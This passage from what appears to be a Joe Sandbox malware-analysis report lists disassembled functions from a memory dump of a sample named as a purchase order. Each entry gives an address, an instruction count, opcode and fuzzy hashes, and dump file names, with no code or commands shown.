API ID:
String ID:
API String ID:
Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
Instruction ID: 1d2b18f485fd2ff5e6e7b38abb4ba6274c05ddf035a2459788fcc8417cc4a438
Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
Instruction Fuzzy Hash: C8F0F63364053E9BC33216D94980B7FB5A6EFD6B70F260039B705BB620CA648C02F6D4

Function 010D4B67 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49990f33a4fc0242180f2a27bbb39a9ef216848c2fcd8a4c2d65b753e6e97749
Instruction ID: b57f1bb112aa5525d42eecd6d279c50b6848a93c1edc6dea7bcfdf41fc461ddf
Opcode Fuzzy Hash: 49990f33a4fc0242180f2a27bbb39a9ef216848c2fcd8a4c2d65b753e6e97749
Instruction Fuzzy Hash: 180144B1A00209AFDB00DFA9D991ADEBBF8FF58714F14406AF941F7340D634DA018BA0

Function 010D4BE0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023c1ae17f2fae0f45d872508d732db1574a05b15b75f58f083751548a483f2a
Instruction ID: d7773599890cc82ac0ca46a3c0958fec227ab7f1badb28a2d492c96fd33297ac
Opcode Fuzzy Hash: 023c1ae17f2fae0f45d872508d732db1574a05b15b75f58f083751548a483f2a
Instruction Fuzzy Hash: 24012CB1A0031DAFCB04DFA9D991AEEBBF8EF58714F50406AF940F7341D674A9018BA4

Function 010D4C59 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf1164731a22e3184967a6a772c02041bda054cc98090edd893f9f5fd63769d
Instruction ID: 4e8a2207c9c1460620ee73e0e203582ccdfd0b3dafdc90bffda122d10215c868
Opcode Fuzzy Hash: 1bf1164731a22e3184967a6a772c02041bda054cc98090edd893f9f5fd63769d
Instruction Fuzzy Hash: 3B0121B1A1020DAFDB00DF69D941ADEB7F8EF58714F50406AF940F7340D67499018BA0

Function 010D4CD2 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df7b9c3a861bf751779fc0b09792e482c577c630548c914f46edea47df58967
Instruction ID: 1f07c81c64990136852a8a8320b4f8dec597bb09f99ca974133784daa8b26548
Opcode Fuzzy Hash: 4df7b9c3a861bf751779fc0b09792e482c577c630548c914f46edea47df58967
Instruction Fuzzy Hash: 580121B1A0020DAFDB00DFA9E991ADEBBF8FF58714F10406AF940E7340D6749A018BA4

Function 0103C98F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
Instruction ID: 60e96f7c7b524475f13833cfbd7bf8e4a8695f00902178da0719c6ba9875b31a
Opcode Fuzzy Hash: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
Instruction Fuzzy Hash: FD01F432640A84ABE326665ED90CB59BBDCEFC1750F0980E3FE84EF2A1D679C801C215

Function 01086040 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
Instruction ID: 0b317ccabc77ff70f99f1bf0b915994db1d7519267fddf069f13b76922a8f282
Opcode Fuzzy Hash: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
Instruction Fuzzy Hash: 4BF0627210000DBFEF01AF94CD80DEF7BBDFB55298B100124FA0096020D332DD21ABA0

Function 00FFC090 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180fe2f1474ef36a3fd42be494c7b02f4e073ae3211f02f0313ae58115594c78
Instruction ID: e252e5db7a23bcb3dee70e40bdfa53768c49471dccb9d578277e4f7a362ce755
Opcode Fuzzy Hash: 180fe2f1474ef36a3fd42be494c7b02f4e073ae3211f02f0313ae58115594c78
Instruction Fuzzy Hash: 53F0F632A4426D9AE314D6058E00B737397DF90721F294026EB05CB2E1ED729C029298

Function 0103648A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9816600e53904a5ad05f49e701a34dcd678aad0418dde89dd3374a92d53a8366
Instruction ID: a952597782f36d9155a55189d633e9b49265750db6096c02bf9e9c3ba7693d82
Opcode Fuzzy Hash: 9816600e53904a5ad05f49e701a34dcd678aad0418dde89dd3374a92d53a8366
Instruction Fuzzy Hash: 6D01AF70B81681ABF736AB6CDD49B253BEDBB90B10F0840D4BAC1CB6D2DB6DD9008214

Function 0108C51D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c162bd37a387be53a3fcb2f8514d92642e0fea69ab1a0949be1607fd6f83bc
Instruction ID: 6e228f8c917d8a92fbaeb61e73aaeaebddf0f9b3402c5c7999d4838ba55254e5
Opcode Fuzzy Hash: b7c162bd37a387be53a3fcb2f8514d92642e0fea69ab1a0949be1607fd6f83bc
Instruction Fuzzy Hash: 99F0A4B02097049FD714EF28C541E5AB7E4EF58B14F80465EB8D8DB384E634E900C796

Function 0108E4F2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
Instruction ID: ee0517f52a9ef7138dccd198b2e99fa010bd1df8a2b71892fe0b7e14768f8bad
Opcode Fuzzy Hash: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
Instruction Fuzzy Hash: 4DF05E333096129BD731AA4DD880F16B7F8BF96A20F1904A5A7C49B664EA60EC4187A0

Function 01030774 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction ID: 9aff54b3cd767995fd7fe1074b5017f7806e66fb6256820f95761b665968cb17
Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction Fuzzy Hash: 73F02472A01204AFE325DF25CC01B96B7EDEFD8300F248078A544C7164FAB1DD01C614

Function 0108C592 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d75ae24d8443ad51af879cd28d71a3e52dfe46c8c83c2a973c5d9897d176d0d6
Instruction ID: 003ade7c26453e195d277f0c45960f9947f6476342bce891157f9e749b8010b0
Opcode Fuzzy Hash: d75ae24d8443ad51af879cd28d71a3e52dfe46c8c83c2a973c5d9897d176d0d6
Instruction Fuzzy Hash: B1F062B0A0120DEFDB04EF69D555B9EB7F4EF18304F508069B995EB385DA38EA01CB60

Function 0100471B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e37bfd0805f05b4fae601d71ffaf014cd380077e67a6be918acee4c4e1cb3f5
Instruction ID: f3e92d53b9ec1b038d28d87fa92bd32ff980e660640625382e1e82969b4f468b
Opcode Fuzzy Hash: 0e37bfd0805f05b4fae601d71ffaf014cd380077e67a6be918acee4c4e1cb3f5
Instruction Fuzzy Hash: D2F0F0B1405A90DEFB63836C8044B617BC4BB03260F0988E6C7EDCB592C3B4D884C258

Function 0103C50D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2b15eb5fce90530600a2f59a4c6e2362afc7b61e9d57c5bddac11eba70d9a3
Instruction ID: 5a7e6d6931f82838cb313d2fa64c584508e2a0cdaf90ebce5b94b037f4746990
Opcode Fuzzy Hash: 4b2b15eb5fce90530600a2f59a4c6e2362afc7b61e9d57c5bddac11eba70d9a3
Instruction Fuzzy Hash: 77F0E2B15116909BF762936CC248B617BDCAB826A4F0981A7D5C6D7692C774D8C0C284

Function 01042539 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction ID: 7a88b3a083babfe7a8e5038c252ff7227c0d79bf2cc629f9d2c1215733ae1bce
Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction Fuzzy Hash: 1EE0D8723405412BE721BE599CD4F877B9EDFE2B10F044479B9045F142C9E6DD0983A0

Function 010D4D4B Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d1163890398ec4093c24a254f04627dad28306743593c1284f34e431d7383c3
Instruction ID: 103e2085443f43a01da59a21fc2aafd2f1f3e5116e568cf8d4118768e0a3ddbd
Opcode Fuzzy Hash: 1d1163890398ec4093c24a254f04627dad28306743593c1284f34e431d7383c3
Instruction Fuzzy Hash: BCF082B0A10249ABDB04EBA8D955FAEB7F8AF14708F5004A8BA41EB2C0EA74D900C754

Function 010D4DA7 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 032f8374777b2eb518cd7fb18d0b7e761cc01f046a8ff69b5c8467f8d3bb671f
Instruction ID: 6a0105a9be325ee0a82c69a09e9887f69d8897cd28f7875edd47fc035d49deff
Opcode Fuzzy Hash: 032f8374777b2eb518cd7fb18d0b7e761cc01f046a8ff69b5c8467f8d3bb671f
Instruction Fuzzy Hash: D1F082B0A14319AFDB14EBA8E955FAEB7F8AF04704F5004A8B941EB285EA74D900C754

Function 0107CCF0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
Instruction ID: d8a7ef3e7bd94f55147dcc5bc41ffab25b200f926fff5af18bd319d36a60528a
Opcode Fuzzy Hash: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
Instruction Fuzzy Hash: A3F0EC3351061467C23069098C05F97BB9CDBD5B30F140319BA549B1D0D670E911C7D5

Function 01000630 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
Instruction ID: d3e668723747b248446993aaf624251ef6218fc7d5f39d6d0c2e1673abfeda58
Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
Instruction Fuzzy Hash: ACF0E5352047449FDB46CF15C840AD97BE5BB993A0F100094FCC68B341D731F941C741

Function 010348F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c2ced37643fc46b194fa8e92b62d35b081b5511c920db5bf1728bfaea927f2d
Instruction ID: 54ad07bf6bc2a2ae128da88a6017efd2e3d777ad14f5035009b284086dd78682
Opcode Fuzzy Hash: 1c2ced37643fc46b194fa8e92b62d35b081b5511c920db5bf1728bfaea927f2d
Instruction Fuzzy Hash: 88E09232244109BBD3316E699800B6A77ED9BD5762F150C2AE2C0CF240DAB4D841C390

Function 00FFEBC0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
Instruction ID: 5c8c7f2ebbd9d7a0e30665f4caee7a8c39e337e9c3915c19473fa9a5aba42ef3
Opcode Fuzzy Hash: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
Instruction Fuzzy Hash: 63F0A0321042CCAFEB248F84C845FB537A4EF90735F048029F71A8A071CB74D980EB05

Function 00FF8DCD Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
Instruction ID: 0f0df9fe4ad88219633f879ebd8a14489aa0af296d59341ede85aa29884e44fe
Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
Instruction Fuzzy Hash: D1F08C32101605DFC7716A18DC41B6777E1AF55760F114669B2971A8F0CA38E842EA54

Function 010A630E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 711e9457ce782f1e5c7684819a5d9246772f0e34a0a554018781d21f6ffe8de0
Instruction ID: a8a23ded2f8f00e3b11330c3a10b9c41ddddeab5b79fca2e17fd32f92dd4abb9
Opcode Fuzzy Hash: 711e9457ce782f1e5c7684819a5d9246772f0e34a0a554018781d21f6ffe8de0
Instruction Fuzzy Hash: CDE0DF33600114BBDB21A7998D09F9BBEFCEB94AA1F494064BA41EB090DA31DE01C290

Function 01002500 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91d1d212edb93a3e9df5b454bac84b2f9c5f9052bdd3761951c7a4cee7bfa12e
Instruction ID: b61b8d1f9669b8872c35365c51e5c6a0561f939279375935d93c3f1a32fefdb9
Opcode Fuzzy Hash: 91d1d212edb93a3e9df5b454bac84b2f9c5f9052bdd3761951c7a4cee7bfa12e
Instruction Fuzzy Hash: 1BE092321005459BC322FB18DC41FDA7799EB60365F004129F296575A0CA35A910C7D4

Function 0103C958 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f147f5c56fe06396b7c755659004bf555f28fbe11ef891f4446e9dd1e45098b
Instruction ID: 9666d1a382684e89f7fc3d8bed39b3b6b119bb24b9675a197152efbe371244d4
Opcode Fuzzy Hash: 2f147f5c56fe06396b7c755659004bf555f28fbe11ef891f4446e9dd1e45098b
Instruction Fuzzy Hash: 20D02B334661206ADB72B2297D08FE72A9C9BC2220F0704B3F088F2014D919CC81C2C4

Function 00FF81EB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction ID: 38765e2575c27aa69c3ea81eb7d36613ccd4ecf6036a9a6bf85e1099f4c7cf63
Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction Fuzzy Hash: 85E08632140519EFD7312A14DC00FA176A1BF50760F200569F5C6150748B749892EA48

Function 00FF8C3D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
Instruction ID: 42a937f3a88f9ef2247ac50ee1b6d14810fd7c56bbcf68997ccdbfd1106e3bc2
Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
Instruction Fuzzy Hash: C6E08631001615DFCB716A04DD40FA276E1BF50B60F104579B286094B0CB74EC85E665

Function 010389B0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 00679ab0bb5ed325720f65b1f90704b59f22164444f4c72949d937be650574e2
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 4BE04F33111A1487C729EE18D51266677A8EB85720B09826BA65347780C534E544C799

Function 01056912 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
